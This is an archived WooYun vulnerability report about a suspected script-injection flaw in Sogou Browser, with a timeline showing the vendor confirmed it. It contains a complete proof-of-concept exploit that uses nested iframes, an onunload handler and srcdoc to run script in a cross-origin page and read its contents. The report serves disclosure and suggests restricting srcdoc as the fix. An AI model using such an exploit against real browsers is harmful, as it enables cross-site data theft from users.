当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047388

漏洞标题:搜狗浏览器疑似存在js注入bug

相关厂商:搜狗

漏洞作者: dragonltx

提交时间:2013-12-30 11:54

修复时间:2014-03-30 11:55

公开时间:2014-03-30 11:55

漏洞类型:远程代码执行

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-30: 细节已通知厂商并且等待厂商处理中
2013-12-30: 厂商已经确认,细节仅向厂商公开
2014-01-02: 细节向第三方安全合作伙伴开放
2014-02-23: 细节向核心白帽子及相关领域专家公开
2014-03-05: 细节向普通白帽子公开
2014-03-15: 细节向实习白帽子公开
2014-03-30: 细节向公众公开

简要描述:

任意脚本执行

详细说明:

<body>
<script>
parentFrame = document.body.appendChild(document.createElement("iframe"));
helperFrame1 = parentFrame.contentDocument.body.appendChild(document.createElement("iframe"));
helperFrame1.contentWindow.onunload = function() {
container = document.createElement("div");
targetFrame = container.appendChild(document.createElement("iframe"));
helperFrame2 = targetFrame.appendChild(document.createElement("iframe"));
helperFrame2.src = "javascript:top.container.removeChild(top.targetFrame)";
parentFrame.contentDocument.body.appendChild(container);
}
parentFrame.src = "http://www.baidu.com/";
parentFrame.onload = function() {
parentFrame.onload = null;
targetFrame.srcdoc = "<script>alert(parent.document.body.innerHTML)<\/script>";
targetFrame.contentWindow.location = "about:srcdoc";
}
</script>
</body>

漏洞证明:

Screenshot_2013-12-25-12-47-39.png

null

修复方案:

对srcdoc执行代码进行限制

版权声明:转载请注明来源 dragonltx@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-30 13:43

厂商回复:

收到,谢谢支持

最新状态:

暂无